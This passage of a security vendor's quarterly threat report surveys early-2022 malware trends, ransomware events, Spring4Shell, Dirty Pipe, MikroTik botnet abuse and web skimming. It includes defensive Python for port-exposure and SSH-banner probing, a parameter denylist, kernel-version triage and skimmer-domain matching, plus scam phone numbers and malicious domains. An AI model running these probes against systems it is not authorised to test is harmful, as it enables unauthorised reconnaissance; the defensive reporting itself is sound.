On the contrary, the situation in Ukraine led to a decrease in the adware activity in March; see the graph below showing the adware activity in Ukraine in Q1/22.
Finally, another interesting observation concerns adware activity in major European countries such as France, Germany, and the United Kingdom. The graph below shows increased activity in these countries in March, deviating from the trend of Q1/22.
Concerning the top strains, 64% of adware came from various adware families. The first clearly identified family is RelevantKnowledge, so far with a low prevalence (5%) but with a +97% increase compared to Q4/21. Other identified strains, each with a share of a few percent, are ICLoader, Neoreklami, DownloadAssistant, and Conduit.
As mentioned above, adware activity follows a similar trend as in Q4/21, so the risk ratios remained the same. The most affected regions are still Africa and Asia. In the Q1/22 data, we observed an increase in protected users in Japan (+209%) and France (+87%) compared with Q4/21. On the other hand, a decrease was observed in the Russian Federation (-51%) and Ukraine (-50%).
Adware risk ratio in Q1/22.
Martin Chlumecký, Malware Researcher
Bots
It seems that we are on a rollercoaster with Emotet and Trickbot. Last year, we went through Emotet takedown and its resurrection via Trickbot. This quarter, shutdowns of Trickbot’s infrastructure and Conti’s internal communication leaks indicate that Trickbot has finished its swan song. Its developers were supposedly moved to other Conti projects, possibly also with BazarLoader as Conti’s new product. Emotet also introduced a few changes – we’ve seen a much higher cadence of new, unique configurations. We’ve also seen a new configuration timestamp in the log “20220404”, interestingly seen on 24th March, instead of the one we’ve been accustomed to seeing (“20211114”).
There has been a new-ish trend coming with the advent of the war in Ukraine. Simple JavaScript code has been used to create requests to (mostly) Russian web pages – ranging from media to businesses to banks. The code was accompanied by a text denouncing Russian aggression in Ukraine in multiple languages. The code quickly spread around the internet in different variations, such as a variant of the open-source game 2048. Unfortunately, we’ve started to see webpages that incorporated that code without declaring it, so your computer could participate in those actions while you were merely checking the weather on the internet. While these could remind us of Anonymous DDoS operations and LOIC (the open-source stress tool Low Orbit Ion Cannon), these pages were much more accessible to the public, requiring only a browser and coming with (mostly) predetermined lists of targets. Nearing the end of March, we saw a significant decline in their popularity, both in terms of prevalence and the appearance of new variants.
The rest of the landscape does not bring many surprises. We’ve seen a significant risk increase in Russia (~30%) and Ukraine (~15%). Neither should be much of a surprise, though for the latter the increase mostly does not translate into a large number of affected clients.
In terms of numbers, the most prevalent strain was Emotet, which has doubled its market share since last quarter. Most of the other top strains declined slightly in prevalence over the same period. The most common strains we are seeing are:
Emotet
Amadey
Phorpiex
MyloBot
Nitol
MyKings
Dorkbot
Tofsee
Qakbot
Adolf Středa, Malware Researcher
Coinminers
Coincidentally, as cryptocurrency prices are somewhat stable these days, the same goes for the malicious coinmining activity in our user base.
In comparison with the previous quarter, crypto-mining threat actors increased their focus on Taiwan (+69%), Chile (+63%), Thailand (+61%), Malawi (+58%), and France (+58%). This is mainly caused by the continuing and growing use of various web miners that execute JavaScript code in the victim’s browser. On the other hand, the risk of getting infected significantly dropped in Denmark (-56%) and Finland (-50%).
The most common coinminers in Q1/22 were:
XMRig
NeoScrypt
CoinBitMiner
CoinHelper
Jan Rubín, Malware Researcher
Information Stealers
The activities of Information Stealers haven’t significantly changed in Q1/22 compared to Q4/21. FormBook, AgentTesla, and RedLine remain the most prevalent stealers; in combination, they are accountable for 50% of the hits within the category.
We noticed the regional distribution has completely shifted compared to the previous quarter. In Q4/21, Singapore, Yemen, Turkey, and Serbia were the countries most affected by information stealers; in Q1/22, Russia, Brazil, and Argentina rose to the top tier after the increases in risk ratio by 27% (RU), 21% (BR), and 23% (AR) compared to the previous quarter.
Not only a popular destination for information stealers, Latin America also houses many regional-specific stealers capable of compromising victims’ banking accounts. As the underground hacking culture continues to develop in Brazil, these threat groups target their fellow citizens for financial purposes. In Brazil, Ousaban and Chaes pose the most significant threats with more than 100k and 70k hits. In Mexico in Q1/22, we observed more than 34k hits from Casbaneiro. A typical pattern shared between these groups is the multiple-stage delivery chain utilizing scripting languages to download and deploy the next stage’s payload while employing DLL sideloading techniques to execute the final stage.
Furthermore, Raccoon Stealer, an information stealer with Russian origins, significantly decreased in activity since March. Further investigation uncovered messages on Russian underground forums advising that the Raccoon group is not working anymore. A few days after the messages were posted, a Raccoon representative said one of their members died in the Ukrainian War – they have paused operations and plan to return in a few months with a new product.
Next, a macOS malware dubbed DazzleSpy was found using watering hole attacks targeting Chinese pro-democracy sympathizers; it was primarily active in Asia. This backdoor can control macOS remotely, execute arbitrary commands, and download and upload files to attackers, thus enabling keychain stealing, key-logging, and potential screen capture.
Last but not least, more malware that natively runs on M1 Apple chips (and Intel hardware) has been found. The malware family, SysJoker, targets all desktop platforms (Linux, Windows, and macOS); the backdoor is controlled remotely and allows downloading other payloads and executing remote commands.
Anh Ho, Malware Researcher Igor Morgenstern, Malware Researcher Vladimir Martyanov, Malware Researcher Vladimír Žalud, Malware Analyst
Ransomware
We’ve previously reported a decline in the total number of ransomware attacks in Q4/21. In Q1/22, this trend continued with a further slight decrease. As can be seen on the following graph, there was a drop at the beginning of 2022; the number of ransomware attacks has since stabilized.
We believe there are multiple reasons for these recent declines – such as the geopolitical situation (discussed shortly) and the continuing trend of ransomware gangs focusing more on targeted attacks on big targets (big game hunting) than on regular users via spray-and-pray techniques. In other words, ransomware is still a significant threat, but the attackers have slightly changed their targets and tactics. As you will see in the rest of this section, the total numbers are lower, but there was a lot going on regarding ransomware in Q1.
Based on our telemetry, the distribution of targeted countries is similar to Q4/21 with some Q/Q shifts, such as Mexico (+120% risk ratio), Japan (+37%), and India (+34%).
The most (un)popular ransomware strains – STOP and WannaCry – kept their position at the top. Operators of the STOP ransomware keep releasing new variants, and the same applies for the CrySiS ransomware. In both cases, the ransomware code hasn’t considerably evolved, so a new variant merely means a new extension of encrypted files, different contact e-mail and a different public RSA key.
The most prevalent ransomware strains in Q1/22:
WannaCry
STOP
VirLock
GlobeImposter
Makop
Out of the groups primarily focused on targeted attacks, the most active ones based on our telemetry were LockBit, Conti, and Hive. The BlackCat (aka ALPHV) ransomware was also on the rise. The LockBit group boosted their presence and also their egos, as demonstrated by their claim that they will pay any FBI agent that reveals their location a bounty of $1M. Later, they expanded that offer to any person on the planet.
You may also recall Sodinokibi (aka REvil), which is regularly mentioned in our threat reports. There is always something interesting around this ransomware strain and its operators with ties to Russia. In our Q4/21 Threat Report we informed about the arrests of some of its operators by Russian authorities. Indeed, this resulted in Sodinokibi almost vanishing from the threat landscape in Q1/2022. However, the situation got messy at the very end of Q1/2022 and early in April as new Sodinokibi indicators started appearing, including the publishing of new leaks from ransomed companies and malware samples. It is not yet clear whether this is a comeback, an imposter operation, reused Sodinokibi sources or infrastructure, or even their combination by multiple groups. Our gut feeling is that Sodinokibi will be a topic in the Q2/22 Threat Report once again.
Russian ransomware affiliates are a never-ending story. For example, in February a criminal dubbed Wazawaka, with ties to Babuk, DarkSide, and other ransomware gangs, was publicly exposed. In a series of drunk videos and tweets, he revealed much more than his missing finger.
The Russian invasion and following war on Ukraine, the most terrible event in Q1/22, had its counterpart in cyber-space. Just one day before the invasion, several cyber attacks were detected. Shortly after the discovery of HermeticWiper malware by ESET, Avast also discovered ransomware attacking Ukrainian targets. We dubbed it HermeticRansom. Shortly after, a flaw in the ransomware was found by CrowdStrike analysts. We acted swiftly and released a free decryptor to help victims in Ukraine. Furthermore, the war impacted ransomware attacks, as some of the ransomware authors and affiliates are from Ukraine and likely have been unable to carry out their operations due to the war.
And the cyber-war went on, together with the real one. A day after the start of the invasion, the Conti ransomware gang claimed its allegiance and threatened anyone who was considering organizing a cyber-attack or war activities against Russia:
As a reaction, a Ukrainian researcher started publishing internal files of the Conti gang, including Jabber conversations and the source code of the Conti ransomware itself. However, no significant number of encryption keys was leaked. Also, the published sources were older versions of the Conti ransomware, which no longer correspond to the layout of the encrypted files created by today’s version of the ransomware. The leaked files and internal communications provide valuable insight into this large cybercrime organization, and they also temporarily slowed down its operations.
Among the other consequences of the Conti leak, the published source codes were soon used by the NB65 hacking group. This gang declared a karmic war on Russia and used one of the modified sources of the Conti ransomware to attack Russian targets.
Furthermore, in February, members of historically one of the most active (and successful) ransomware groups, Maze, announced a shut-down of their operation. They published master decryption keys for their ransomware strains Maze, Egregor, and Sekhmet; four archive files were published that contained:
30 private RSA-2048 keys (plus 9 from old version) for Maze ransomware. Maze also uses a three-key encryption scheme.
A single private RSA-2048 key for Sekhmet ransomware. Because this strain uses this RSA key to encrypt the per-file key, the RSA private key is likely campaign specific.
Source code for the M0yv x86/x64 file infector, which was used by Maze operators in the past.
Next, an unpleasant turn of events happened after we released a decryptor for the TargetCompany ransomware in February. This immediately helped multiple ransomware victims; however, two weeks later, we discovered a new variant of TargetCompany that started using the “.avast” extension for encrypted files. Shortly after, the malware authors changed the encryption algorithm, so our free decryption tool does not decrypt the most recent variant.
On the bright side, we also analyzed multiple variants of the Prometheus ransomware and released a free decryptor. This one covers all decryptable variants of the ransomware strain, even the latest ones.
Jakub Křoustek, Malware Research Director Ladislav Zezula, Malware Researcher
Remote Access Trojans (RATs)
New year, new me RAT campaigns. As mentioned in the Q4/21 report, we expected the downward trend in RAT activity to be only temporary; reality was a textbook example of this claim. Even malicious actors took holidays at the beginning of the new year and then returned to work.
In the graph below, we can see a Q4/21 vs. Q1/22 comparison of RAT activity:
This quarter’s countries most affected were China, Tajikistan, Kyrgyzstan, Iraq, Kazakhstan, and Russia. Kazakhstan will be mentioned later on with the emergence of a new RAT. We also detected a high Q/Q increase in the risk ratio in countries involved in the ongoing war: Ukraine (+54%), Russia (+53%), and Belarus (+46%).
In this quarter, we spotted a new campaign distributing several RATs, reaching thousands of users, mainly in Italy (1,900), Romania (1,100), and Bulgaria (950). The campaign leverages a crypter (a tool used by malware authors for obfuscation and protection of the target payload), which we call Rattler, that can deliver arbitrary malware onto the victim’s PC. Currently, the crypter primarily distributes remote access trojans, focusing on Warzone, Remcos, and NetWire. Warzone’s main target regions also seemed to change during the past three months. In January and February, we received a considerable number of detections from Russia and Ukraine. This trend reversed in March, with decreased detections in these two countries and a significant increase in Spain, indicating a new malicious campaign.
Most prevalent RATs in Q1 were:
njRAT
Warzone
Remcos
AsyncRAT
NanoCore
NetWire
QuasarRAT
PoisonIvy
Adwind
Orcus
Among the malicious families with the highest increase in detections were Lilith, LuminosityLink, and Gh0stCringe. One of the reasons for the Gh0stCringe increase is a malicious campaign in which this RAT spread on poorly protected MySQL and Microsoft SQL database servers. We have also witnessed a change in the first two places of the most prevalent RATs. In Q4/21, the most pervasive was Warzone, which declined this quarter by 23%. The njRAT family, on the other hand, increased by 32%, and, surprisingly, Adwind entered the top 10.
Apart from the usual malicious campaigns, this quarter was different. There were two significant causes for this. The first was the Lapsus$ hacking and leaking spree, and the other was the war in Ukraine.
The hacking group Lapsus$ targeted many prominent technology companies like NVIDIA, Samsung, and Microsoft. For example, in the NVIDIA case, the group stole about 1TB of NVIDIA’s data and then began leaking it. The leaked data contained binary signing certificates, which were later used for signing malicious binaries. Among such signed malware was, for example, the Quasar RAT.
Then there was the conflict in Ukraine, which showed the power of information technology and the importance of cyber security – because the fight happens not only on the battlefield but also in cyberspace, with DDoS attacks, data-stealing, exploitation, cyber espionage, and other techniques. But beyond the countries involved in the war, everyday people looking for information are easy targets of malicious campaigns. One such campaign involved sending email messages with attached office documents that allegedly contained important information about the war. Unfortunately, these documents were just a way to infect people with Remcos RAT with the help of the Microsoft Office RCE vulnerability CVE-2017-11882, thanks to which the attacker could easily infect unpatched systems.
As always, not only old known RATs showed up. This quarter brought us a few new ones as well. The first addition to our RAT list was IceBot. This RAT seems to be a creation of the APT group FIN7; it has the usual basic capabilities of other RATs, such as taking screenshots, remote code execution, file transfer, and detection of installed AV.
Another one is Hodur. This RAT is a variant of PlugX (also known as Korplug), associated with Chinese APT organizations. Hodur differs from it in its encoding, configuration capabilities, and C&C commands. This RAT allows attackers to log keystrokes, manipulate files, fingerprint the system and more.
We mentioned that Kazakhstan is connected to a new RAT on this list. That RAT is called Borat RAT. The name is taken from the popular comedy film Borat, where the main character Borat Sagdijev, played by actor Sacha Baron Cohen, was presented as a Kazakh visiting the USA. Did you know that, in reality, the part of the film that was supposed to represent life in a Kazakh village wasn’t even filmed there but in the Romanian village of Glod?
This RAT is a .NET binary and uses simple source-code obfuscation. The Borat RAT was initially discovered on hacking forums and contains many capabilities. Some features include triggering BSOD, anti-sandbox, anti-VM, password stealing, web-cam spying, file manipulation and more. As well as these baked-in features, it enables extensive module functionality. These modules are DLLs that are downloaded on demand, allowing the attackers to add multiple new capabilities. The list of currently available modules contains files “Ransomware.dll” used for encrypting files, “Discord.dll” for stealing Discord tokens, and many more.
Here you can see an example of the Borat RAT admin panel.
We also noticed that the volume of compiled Python and Go ELF binaries for Linux increased this quarter. The threat actors used open-source RAT projects (e.g. Bring Your Own Botnet or Ares) and legitimate services (e.g. Onion.pet, termbin.com or Discord) to compromise systems. We were also one of the first to protect users against the Backdoorit and Caligula RATs; both of these malware families were written in Go and captured in the wild by our honeypots.
Samuel Sidor, Malware Researcher Jan Rubín, Malware Researcher David Àlvarez, Malware Researcher
Rootkits
In Q1/22, rootkit activity was reduced compared to the previous quarter, returning to the long-term value, as illustrated in the chart below.
The close-up view of Q1/22 demonstrates that January and February were more active than March.
We have monitored various rootkit strains in Q1/22. However, we have identified that approx. 37% of rootkit activity is r77-Rootkit (R77RK) developed by bytecode77 as an open-source project under the BSD license. The rootkit operates in Ring 3 compared to the usual rootkits that work in Ring 0. R77RK is a configurable tool hiding files, directories, scheduled tasks, processes, services, connections, etc. The tool is compatible with Windows 7 and Windows 10. The consequence is that R77RK was captured with several different types of malware as a supporting library for malware that needs to hide malicious activity.
The graph below shows that China is still the most at-risk country in terms of protected users. Moreover, the risk in China has increased by about 58%, although total rootkit activity has been orders of magnitude lower compared to Q4/21. This phenomenon is caused by the absence of the Cerbu rootkit, which had been spread worldwide, so the main rootkit activity has moved back to China. A decrease in rootkit activity has been observed in Vietnam, Thailand, the Czech Republic, and Egypt.
In summary, the situation around rootkit activity seems calmer compared to Q4/21, and China is still the most affected country in Q1/22. Notably, the war in Ukraine has not increased rootkit activity. Numerous malware authors have started using open-source rootkits, although these are easy to detect.
Martin Chlumecký, Malware Researcher
Technical support scams
After quite an active Q4/21 that overlapped with the beginning of Q1/22, technical support scams started to decline in activity. There were some small peaks of activity, but the significant wave of one particular campaign came at the end of Q1/22.
According to our data, the most targeted countries were the United States and Canada. However, we’ve seen instances of this campaign active in other areas as well, such as Europe (for example, France and Germany).
The distinctive sign of this campaign was the lack of a domain name and a specific path; this is illustrated in the following image.
At the beginning of March, we collected thousands of new unique domain-less URLs that share one significant and distinctive sign: their URL path. After being redirected, an affected user loads a web page with a well-known recycled appearance, used in many previous technical support campaigns. Several pop-up windows, the logos of well-known companies, antivirus-like messaging, cursor manipulation techniques, and even sounds are all there for one simple reason: to get the user to call the phone number shown.
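The “domain-less” property can be checked mechanically. The following is a minimal sketch, assuming that domain-less means the host part of the URL is a literal IP address; the function name and the sample URLs (which use documentation-reserved addresses) are hypothetical, and the campaign’s distinctive path is not reproduced here.

```python
import ipaddress
from urllib.parse import urlsplit


def has_ip_host(url):
    """Return True when the URL's host is a literal IPv4/IPv6 address."""
    host = urlsplit(url).hostname  # None when the URL has no network location
    if host is None:
        return False
    try:
        ipaddress.ip_address(host)
    except ValueError:
        # Not parseable as an IP address, so it is a regular host name.
        return False
    return True


# Hypothetical inputs; 203.0.113.0/24 is reserved for documentation.
samples = [
    "http://203.0.113.7/some/path/index.html",
    "https://example.com/some/path/index.html",
]
flagged = [url for url in samples if has_ip_host(url)]
```

A check like this is only a first filter: plenty of legitimate services are reached by IP address, so it would normally be combined with other signals such as the shared path.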
More than twenty different phone numbers have been used. Examples of such numbers can be seen in the following table:
1-888-828-5604
1-888-200-5532
1-877-203-5120
1-888-770-6555
1-855-433-4454
1-833-576-2199
1-877-203-9046
1-888-201-5037
1-866-400-0067
1-888-203-4992
Alexej Savčin, Malware Analyst
Traffic Direction System (TDS)
A new Traffic Direction System (TDS) we are calling Parrot TDS was very active throughout Q1/2022. The TDS has infected various web servers hosting more than 16,500 websites, ranging from adult content sites and personal websites to university and local government sites.
Parrot TDS acts as a gateway for other malicious campaigns to reach potential victims. In this particular case, the infected sites’ appearances are altered by a campaign called FakeUpdate (also known as SocGholish), which uses JavaScript to display fake notices for users to update their browser, offering an update file for download. The file observed being delivered to victims is a remote access tool.
From March 1, 2022, to March 29, 2022, we protected more than 600,000 unique users from around the globe from visiting these infected sites. We protected the most in Brazil – over 73,000 individual users, in India – nearly 55,000 unique users, and more than 31,000 unique users from the US.
Jan Rubín, Malware Researcher Pavel Novák, Threat Operations Analyst
Vulnerabilities and Exploits
Spring in Europe has had quite a few surprises for us, one of them being a vulnerability in a Java framework called, ironically, Spring. The vulnerability is called Spring4Shell (CVE-2022-22965), mimicking the name of last year’s Log4Shell vulnerability. Similarly to Log4Shell, Spring4Shell leads to remote code execution (RCE). Under specific conditions, it is possible to bind HTTP request parameters to Java objects. While there is logic protecting classLoader from being used, it was not foolproof, which led to this vulnerability. Fortunately, the vulnerability requires a non-default configuration, and a patch is already available.
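To illustrate the idea of refusing dangerous parameter names before they are bound to object properties, here is a minimal sketch in Python. It is not Spring’s implementation: the four patterns mirror the disallowed-field workaround that was widely recommended for Spring’s data binder, while the function names and the glob-style matching via `fnmatchcase` are assumptions made for this example.

```python
from fnmatch import fnmatchcase

# Patterns modelled on the commonly cited disallowed-field workaround.
DISALLOWED_FIELDS = ("class.*", "Class.*", "*.class.*", "*.Class.*")


def is_disallowed(param_name):
    """Return True if a request parameter name matches a denied pattern."""
    return any(fnmatchcase(param_name, pattern) for pattern in DISALLOWED_FIELDS)


def filter_bindable(params):
    """Keep only the parameters that may be bound to object properties."""
    return {name: value for name, value in params.items() if not is_disallowed(name)}
```

For instance, `filter_bindable({"name": "x", "class.module.classLoader.foo": "y"})` keeps only `name`. A denylist like this shows why such protections are fragile: any property path the patterns fail to anticipate passes straight through, so patching remains the real fix.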
The Linux kernel had its share of vulnerabilities; a vulnerability was found in pipes, which usually provide unidirectional interprocess communication, that can be exploited for local privilege escalation. The vulnerability was dubbed Dirty Pipe (CVE-2022-0847). It relies on the usage of partially uninitialized memory of the pipe buffer during its construction, leading to an incorrect value of flags, potentially providing write-access to pages in the cache that were originally marked with a read-only attribute. The vulnerability is already patched in the latest kernel versions and has already been fixed in most mainstream Linux distributions.
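A rough way to triage a host is to compare its kernel release string against the upstream fix points. The sketch below assumes figures that are not stated in this report and should be verified against the upstream advisory: the flaw is taken to affect kernels from 5.8 onward and to be fixed in 5.16.11, 5.15.25, and 5.10.102. Distribution kernels often backport fixes without changing the upstream version number, so the result is a hint, not a verdict; the function name is hypothetical.

```python
import re

# Assumed first fixed patch release per upstream stable series.
FIRST_FIXED = {(5, 16): 11, (5, 15): 25, (5, 10): 102}


def upstream_looks_vulnerable(release):
    """Guess from a release string such as '5.15.0-91-generic' whether the
    upstream version falls into the assumed Dirty Pipe range."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if match is None:
        raise ValueError("unrecognized kernel release: %r" % release)
    series = (int(match.group(1)), int(match.group(2)))
    patch = int(match.group(3) or 0)
    # Outside the assumed affected window: older than 5.8, or 5.17 and newer.
    if series < (5, 8) or series >= (5, 17):
        return False
    first_fixed = FIRST_FIXED.get(series)
    if first_fixed is None:
        # Affected series with no fix point listed in the table above.
        return True
    return patch < first_fixed
```

On a Linux machine, the input would typically come from `platform.release()`.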
First described by Trend Micro researchers in 2019, the SLUB malware is a highly targeted and sophisticated backdoor/RAT spread via browser exploits. Now, three years later, we detected its new exploitation attack, which took place in Japan and targeted an outdated Internet Explorer.
The initial exploit injects into winlogon.exe, which will, in turn, download and execute the final stage payload. The final stage did not change much since the initial report, and it still uses Slack as a C&C server but now uses file[.]io for data exfiltration.
This is an excellent example that old threats never really go away; they often continue to evolve and pose a threat.
Adolf Středa, Malware Researcher Jan Vojtěšek, Malware Researcher
Mikrotik CVEs keep giving
It’s been almost four years since the very severe vulnerability CVE-2018-14847 targeting MikroTik devices first appeared. What seemed to be yet another directory traversal bug quickly escalated into user database and password leaks, resulting in a potentially disastrous vulnerability ready to be misused by cybercriminals. Unfortunately, the simplicity of exploitation, the wide adoption of these devices, and their powerful features provided a solid foundation for various malicious campaigns executed using these devices. These started with injecting crypto-mining JavaScript into web pages by capturing traffic, and continued with poisoning the DNS cache and incorporating these devices into botnets for DDoS and proxy purposes.
Unfortunately, these campaigns come in waves, and we still observe MikroTik devices being misused repeatedly. In Q1/22, we’ve seen a lot of exciting twists and turns, the most prominent of which was probably the Conti group leaks, which also shed light on the TrickBot botnet. For quite some time, we knew that TrickBot abused MikroTik devices as proxy servers to hide the next tier of their C&C. The leaking of Conti and TrickBot infrastructure meant the end of this botnet. However, it also provided us with clues and information about one of the largest botnet-as-a-service operations, connecting Glupteba, Meris, crypto-mining campaigns, and perhaps also TrickBot. We are talking about 230K devices controlled by one threat actor and rented out as a service. You can find more in our research Mēris and TrickBot standing on the shoulders of giants.
A few days before we published our research in March, a new story emerged describing a DDoS campaign most likely tied to the Sodinokibi ransomware group. Unsurprisingly, most of the attacking devices were MikroTik again. A few days ago, we were contacted by security researchers from SecurityScorecard. They have observed another DDoS botnet, called Zhadnost, targeting Ukrainian institutions and again using MikroTik devices as an amplification vector. This time, they were mainly misusing DNS amplification vulnerabilities.
We also saw one compelling instance of a network security incident potentially involving MikroTik routers. In the infamous cyberattack on February 24th against the Viasat KA-SAT service, attackers penetrated the management segment of the network and wiped firmware from client terminal devices.
The incident surfaced more prominently after the cyberattack paralyzed 11 gigawatts of German wind turbine production as a probable spill-over from the KA-SAT issue. The connectivity for turbines is provided by EuroSkyPark, one of the satellite internet providers using the KA-SAT network.
When we analyzed AS208484, an autonomous system assigned to EuroSkyPark, we found 15 MikroTik devices with exposed TCP port 8728, which is used for API access to administer the devices. Also of concern, one of the devices had the port of the infamously vulnerable WinBox protocol exposed to the Internet. As of now, all mentioned ports are closed and no longer accessible.
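Administrators can run the same kind of exposure check against their own devices. The sketch below is a minimal TCP connect test, not the methodology used in this research: port 8728 comes from the text above, while 8291 as the usual WinBox default is an assumption that is not stated in this report, and the function names are hypothetical. It should only be run against devices you are authorized to test.

```python
import socket

# 8728: API port named in the text; 8291: assumed WinBox default port.
MIKROTIK_PORTS = {"api": 8728, "winbox": 8291}


def is_tcp_port_open(host, port, timeout=2.0):
    """Return True if a TCP connection to host:port can be established."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Refused, timed out, unreachable, or name resolution failed.
        return False


def exposed_services(host, ports=None, timeout=2.0):
    """Return the sorted names of management services reachable on the host."""
    ports = MIKROTIK_PORTS if ports is None else ports
    return sorted(
        name for name, port in ports.items() if is_tcp_port_open(host, port, timeout)
    )
```

Running `exposed_services("192.0.2.1")` from outside the network (the address is a documentation placeholder) should ideally return an empty list; anything else means a management interface is reachable from the Internet.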
We also found SSH access remapped to non-standard ports such as 9992 or 9993. This is not common practice and may also indicate compromise. Attackers have been known to remap the ports of standard services (such as SSH) to make them harder to detect, or even to make the device harder for its owner to manage. However, this could also have been configured deliberately by the owner for the same reason: to hide SSH access from plain sight.
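Whether an unexpected port actually speaks SSH can be confirmed by reading the first bytes the service sends. This is a minimal sketch that assumes the server sends its identification string (which begins with `SSH-`) immediately on connect; servers are allowed to send other lines first, so a negative result is not conclusive. The function names are hypothetical, and the check is meant for devices you administer.

```python
import socket


def is_ssh_banner(data):
    """Return True if the received bytes start like an SSH identification string."""
    return data.startswith(b"SSH-")


def speaks_ssh(host, port, timeout=3.0):
    """Connect to host:port and report whether the service greets with an SSH banner."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as conn:
            # The connect timeout also applies to this read.
            return is_ssh_banner(conn.recv(255))
    except OSError:
        # Closed port, timeout, or a service that stays silent.
        return False
```

Looping `speaks_ssh` over a device’s open ports gives a quick inventory of where SSH really listens, which can then be compared with the intended configuration.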
From all the above, it’s apparent that we can expect to see similar patterns and DDoS attacks carried not only by MikroTik devices but also by other vulnerable IoT devices in the foreseeable future. On a positive note, the number of MikroTik devices vulnerable to the most commonly misused CVEs is slowly decreasing as new versions of RouterOS (OS that powers the MikroTik appliances) are rolled out. Unfortunately, however, there are many devices already compromised, and without administrative intervention, they will continue to be used for malicious operations repeatedly.
We strongly recommend that MikroTik administrators ensure they have updated and patched to protect themselves and others.
If you are a researcher and you think you have seen MikroTik devices involved in some malicious activity, please consider contacting us if you need help or consultation; since 2018, we have built up a detailed understanding of these devices’ threat landscape.
Martin Hron, Malware Researcher
Web skimming
In Q1/22, the most prevalent web skimming malicious domain was naturalfreshmall[.]com, with more than 500 e-commerce sites infected. The domain itself is no longer active, but many websites are still trying to retrieve malicious content from it. Unfortunately, it means that administrators of these sites still have not removed malicious code and these sites are likely still vulnerable. Avast protected 44k users from this attack in the first quarter.
The heatmap below shows the most affected countries in Q1/22 – Saudi Arabia, Australia, Greece, and Brazil. Compared to Q4/21, Saudi Arabia, Australia and Greece stayed at the top, but in Brazil, we protected almost two times more users than in the previous quarter. Multiple websites were infected in Brazil, some with the aforementioned domain naturalfreshmall[.]com. In addition, we tweeted about philco.com[.]br, which was infected with yoursafepayments[.]com/fonts.css. And last but not least, pernambucanas.com[.]br was also infected with malicious JavaScript hidden in the file require.js on their website.
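Site administrators can search their own pages for references to such domains. The following is a minimal sketch, assuming the skimmer is pulled in through a `script` `src` or `link` `href` attribute; the two indicator domains are taken from the text above, while the class and function names are hypothetical. It would not catch code injected inline or into a locally hosted file such as the require.js case.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


def refang(indicator):
    """Turn a defanged indicator such as 'example[.]com' into a plain host name."""
    return indicator.replace("[.]", ".")


# Indicator domains mentioned in the text, stored defanged.
SKIMMER_DOMAINS = {refang("naturalfreshmall[.]com"), refang("yoursafepayments[.]com")}


class ResourceCollector(HTMLParser):
    """Collect URLs referenced by <script src=...> and <link href=...>."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            wanted = (tag == "script" and name == "src") or (tag == "link" and name == "href")
            if wanted and value:
                self.urls.append(value)


def find_skimmer_references(html, domains=SKIMMER_DOMAINS):
    """Return referenced URLs whose host is a listed domain or one of its subdomains."""
    parser = ResourceCollector()
    parser.feed(html)
    hits = []
    for url in parser.urls:
        host = urlsplit(url).hostname or ""
        if any(host == d or host.endswith("." + d) for d in domains):
            hits.append(url)
    return hits
```

Relative URLs have no host and are ignored, so a clean page yields an empty list.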
Overall the number of protected users remains almost the same as in Q4/21.
Pavlína Kopecká, Malware Analyst
Mobile-Related Threats
Adware/HiddenAds
Adware maintains its dominance over the Android threat landscape, continuing the trend from previous years. Generally, the purpose of Adware is to display out-of-context advertisements to the device user, often in ways that severely impact the user experience. In Q1/22, HiddenAds, FakeAdblockers, and others have spread to many Android devices; these applications often display device-wide advertisements that overlay the user’s intended activity or limit the app’s functionality by displaying timed ads without the ability to skip them.
Adware comes in various configurations; one popular category is stealthy installation. Such apps share common features that make them difficult for the user to identify. Hiding the application’s icon from the home screen is a common technique, as is using blank application icons to mask its presence. The user may struggle to identify the source of the intrusive advertisements, especially if the applications have a built-in delay timer after which they display the ads. Another Adware tactic is to use in-app advertisements that are overly aggressive, sometimes to the extent that they make the original app’s intended functionality barely usable. This is common, especially in games, where timed ads are often shown after each completed level; frequently, the ad screen time greatly exceeds the time spent playing the game.
The Google Play Store has previously been used to distribute malware, but recently, actors behind these applications have changed tactics to use browser pop-up windows and notifications to spread the Adware. These are intended to trick users into downloading and installing the application, often disguised as games, ad blockers, or various utility tools. Therefore, we strongly recommend that users avoid installing applications from unknown sources and be on the lookout for malicious browser notifications.
According to our data, India, the Middle East, and South America are the most affected regions. But Adware is not strictly limited to these regions; it’s prevalent worldwide.
As can be seen from the graph below, Adware’s presence in the mobile sphere has remained dominant but relatively unchanged. Of course, there’s slight fluctuation during each quarter, but there have been no stand-out new strains of Adware as of late.
Bankers
In Q1/2022, some interesting shifts were observed in the banking malware category. With Cerberus/Alien and its clones still leading the scoreboard by far, the battle for second place has seen a change, with Hydra replacing FluBot, previously a significant threat. Additionally, FluBot has been on the decline throughout Q1.
Different banker strains have been reported to use the same distribution channels and branding, which we can confirm from our own observations. Many banking threats now reuse the proven techniques of masquerading as delivery services, parcel tracking apps, or voicemail apps.
After the departure of FluBot from the scene, we observed an overall slight drop in the number of affected users, but this seems only to be returning to the numbers we’ve observed in the last year, just before FluBot took the stage.
The most targeted countries remain Turkey, Spain and Australia.
PremiumSMS/Subscription scams
While PremiumSMS/Subscription related threats may not be as prevalent as in the previous years, they are certainly not gone for good. As reported in the Q4/21 report, a new wave of premium subscription-related scams keeps popping up. Campaigns such as GriftHorse or UltimaSMS made their rounds last year, followed by yet another similar campaign dubbed DarkHerring.
The main distribution channel for these seems to be Google Play, but they have also been observed being downloaded from alternative channels. Similar to before, this scam preys on the mobile operator’s subscription scheme, where an unsuspecting user is lured into giving out their phone number. The number is later used to register the victim to a premium subscription service. This can go undetected for a long time, causing the victim significant monetary loss due to the stealthiness of the subscription and hassle related to canceling such a subscription.
While the primary target of these campaigns seems to remain the same as in Q4/21 – targeting the Middle East, countries like Iraq, Jordan, but also Saudi Arabia, and Egypt – the scope has broadened and now includes various Asian countries as well – China, Malaysia and Vietnam amongst the riskiest ones.
As can be seen from the quarterly comparisons in the graph below, the spikes of activity of the respective campaigns are clear, with UltimaSMS and GriftHorse causing the spike in Q4/21. DarkHerring is behind the Q1/22 spike.
Ransomware/Lockers
Ransomware apps and Lockers that target the Android ecosystem often attempt to ‘lock’ the user’s phone by disabling the navigation buttons and taking over the Android lock screen to prevent the user from interacting with the device and removing the malware. This is commonly accompanied by a ransom message requesting payment to the malware owner in exchange for unlocking the device.
